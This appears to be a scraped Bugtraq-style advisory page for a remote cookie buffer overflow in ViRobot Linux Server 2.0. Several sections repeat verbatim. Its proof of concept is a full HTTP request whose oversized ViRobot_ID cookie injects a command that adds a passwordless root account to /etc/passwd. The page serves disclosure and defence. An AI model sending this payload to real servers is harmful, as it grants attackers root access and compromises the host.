ViRobot Linux Server Remote Buffer Overflow Vulnerability
BID:13964
Info
ViRobot Linux Server Remote Buffer Overflow Vulnerability
| Bugtraq ID: | 13964 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 15 2005 12:00AM |
| Updated: | Jun 15 2005 12:00AM |
| Credit: | Discovery is credited to Kevin Finisterre. |
| Vulnerable: |
ViRobot Linux Server 2.0 |
| Not Vulnerable: | |
Discussion
ViRobot Linux Server Remote Buffer Overflow Vulnerability
ViRobot Linux Server is prone to a remote buffer overflow vulnerability affecting the Web based management interface. This issue presents itself because the application fails to perform boundary checks prior to copying user-supplied data into sensitive process buffers.
An attacker can unauthorized access to a vulnerable computer by supplying malformed values through cookies. This issue can lead to a complete compromise.
ViRobot Linux Server 2.0 is vulnerable to this issue. Other versions may be affected as well.
ViRobot Linux Server is prone to a remote buffer overflow vulnerability affecting the Web based management interface. This issue presents itself because the application fails to perform boundary checks prior to copying user-supplied data into sensitive process buffers.
An attacker can unauthorized access to a vulnerable computer by supplying malformed values through cookies. This issue can lead to a complete compromise.
ViRobot Linux Server 2.0 is vulnerable to this issue. Other versions may be affected as well.
Exploit / POC
ViRobot Linux Server Remote Buffer Overflow Vulnerability
An exploit is not required.
The following proof of concept is available:
POST /cgi-bin/addschup HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.3) Gecko/20041007 Debian/1.7.3-5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-length: 1
Cookie: ViRobot_ID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/bin/echo r00t::0:0:root:/root:/bin/bash >> /etc/passwd &
An exploit is not required.
The following proof of concept is available:
POST /cgi-bin/addschup HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.3) Gecko/20041007 Debian/1.7.3-5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-length: 1
Cookie: ViRobot_ID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/bin/echo r00t::0:0:root:/root:/bin/bash >> /etc/passwd &
Solution / Fix
ViRobot Linux Server Remote Buffer Overflow Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
ViRobot Linux Server Remote Buffer Overflow Vulnerability
References:
References:
- Global Hauri ViRobot Server cookie overflow (Kevin Finisterre)
- Linux Server Product Page (ViRobot)